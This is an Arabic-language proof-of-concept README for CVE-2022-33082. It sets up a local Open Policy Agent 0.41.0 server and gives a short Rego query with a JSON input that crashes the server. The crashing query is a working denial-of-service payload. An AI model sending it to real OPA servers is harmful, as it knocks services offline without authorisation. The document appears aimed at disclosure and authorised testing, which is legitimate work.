استغلال CVE 2022-33082
إخلاء مسؤولية
تم توفير هذا الكود لأغراض أخلاقية - فهم الثغرة واختبار الأنظمة الخاصة أو الأنظمة المصرح بها. باستخدام هذا، فإنك توافق على التصرف بأخلاقية وأنا لا أتحمل أي مسؤولية إذا لم تتصرف بأخلاقية.
يعمل هذا الاستغلال على إصدارات Open Policy Agent (OPA) 0.41.0 وما دون. قم بتثبيت مثيل OPA على Linux لاختباره باستخدام هذا الأمر:
curl -L -o opa https://openpolicyagent.org/downloads/v0.41.0/opa_linux_amd64_static
chmod +x opa
./opa run --server
ثم، انتقل إلى localhost:8181 في متصفح الويب الخاص بك. أدخل ما يلي في الحقول المخصصة
حقل الاستعلام (كود Go):
p := [input() | input := 1]
{ "input":"ضع هذا في حقل الإدخال (json)!" }
سيتعطل الموقع بعد ذلك وسيبلغ الطرفية التي تشغل الخادم عن ذعر kernel
الآثار
يمكن لأي شخص لديه وصول ويب إلى خادم OPA بإصدار 0.41.0 أو أقل تعطيل الخادم بالكامل. هذا الخادم غير محمي بكلمة مرور بشكل افتراضي.